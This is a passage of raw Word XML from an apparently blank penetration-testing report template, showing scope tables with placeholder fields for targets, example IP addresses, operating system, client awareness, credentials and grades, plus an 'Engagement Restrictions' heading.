          <w:p w14:paraId="1D49F9BA" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">[Insert Test Type: Blackbox, Whitebox, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Graybox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="922" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39FE03C7" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>x86_64 GNU/Linux, Ubuntu 20.04.4 LTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="734" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60E3AD67" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Primary Domain</w:t>
            </w:r>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:hyperlink r:id="rId10">
              <w:r w:rsidRPr="008C677D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="14"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>some-domain.com</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1025" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19802688" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Yes/No (Specify if client was aware of testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1078" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6452E846" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">[Insert Technology Stack: Apache, NGINX, Framework: Django, Ruby on Rails, React, </w:t>
            </w:r>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:br/>
              <w:t>Node.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BA5C076" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>User:</w:t>
            </w:r>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:br/>
              <w:t>Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00D55273" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">[Insert Functionalities: Login, Payment System, API, </w:t>
            </w:r>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:br/>
              <w:t>cart</w:t>
            </w:r>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:br/>
              <w:t>Profile</w:t>
            </w:r>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>SignUP</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Passwod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> reset</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12C8C89E" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>[C]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BC509C6" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>[A]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A1FCA4B" w14:textId="088CC8AD" w:rsidR="00112BBC" w:rsidRPr="00E40E14" w:rsidRDefault="00112BBC" w:rsidP="000479B0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="network"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidRPr="00E40E14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="53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9"/>
        <w:gridCol w:w="2637"/>
        <w:gridCol w:w="825"/>
        <w:gridCol w:w="923"/>
        <w:gridCol w:w="1062"/>
        <w:gridCol w:w="820"/>
        <w:gridCol w:w="1047"/>
        <w:gridCol w:w="998"/>
        <w:gridCol w:w="941"/>
      </w:tblGrid>
      <w:tr w:rsidR="00112BBC" w14:paraId="63E2F3F9" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="496"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="60A09A6D" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Engagement Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="0C51391E" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Target System(s)Host Name /IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="2308EE7F" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Audit/ Test Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="28B23343" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Operating System(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="576562DC" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Domain Names</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="678E83BC" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Client Awareness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="6160C020" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Login Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="57B77CFE" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Start Grade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="3542EF4C" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>Closure Grade</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112BBC" w14:paraId="57549A71" w14:textId="77777777" w:rsidTr="00EA00E3">
        <w:trPr>
          <w:trHeight w:val="1381"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14B68E99" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Insert Audit Type: Security Audit, Vulnerability Assessment, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A892FB7" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Primary Target</w:t>
            </w:r>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">: [Insert Primary Target </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>System]  -</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Additional Systems</w:t>
            </w:r>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">: [Insert Additional Systems]- </w:t>
            </w:r>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Primary Address</w:t>
            </w:r>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">: 1.2.3.4  - </w:t>
            </w:r>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Additional Addresses</w:t>
            </w:r>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>: 5.6.7.8, 2001:db8:3333:4444:cccc:dddd:eeee:ffff</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BF858CC" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">[Insert Test Type: Blackbox, Whitebox, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Graybox</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4173515E" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>x86_64 GNU/Linux, Ubuntu 20.04.4 LTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00055307" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Domain.local</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="674ED8C8" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Yes/No (Specify if client was aware of testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56DF550F" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Provided/Not Provided (Details not included for security)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50CF176F" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>[Insert Start Grade/Initial Assessment Score]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33C2E83F" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="008C677D" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C677D">
              <w:rPr>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>[Insert Closure Grade/Final Assessment Score]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63B5CDEB" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="006B12F7" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="engagement-restrictions"/>
      <w:bookmarkStart w:id="42" w:name="_Toc178498969"/>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidRPr="006B12F7">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Engagement Restrictions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="50A9ADA7" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="001937A8" w:rsidRDefault="00112BBC" w:rsidP="00112BBC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pP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336"/>
        <w:gridCol w:w="7014"/>
      </w:tblGrid>
      <w:tr w:rsidR="00112BBC" w14:paraId="67F94E90" w14:textId="77777777" w:rsidTr="00EA00E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shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
          </w:tcPr>
          <w:p w14:paraId="1877AE1F" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="004140D3" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="004140D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Restrictions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="425F958E" w14:textId="77777777" w:rsidR="00112BBC" w:rsidRPr="004140D3" w:rsidRDefault="00112BBC" w:rsidP="00EA00E3">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="004140D3">
              <w:t>Defines limitations and constraints during testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
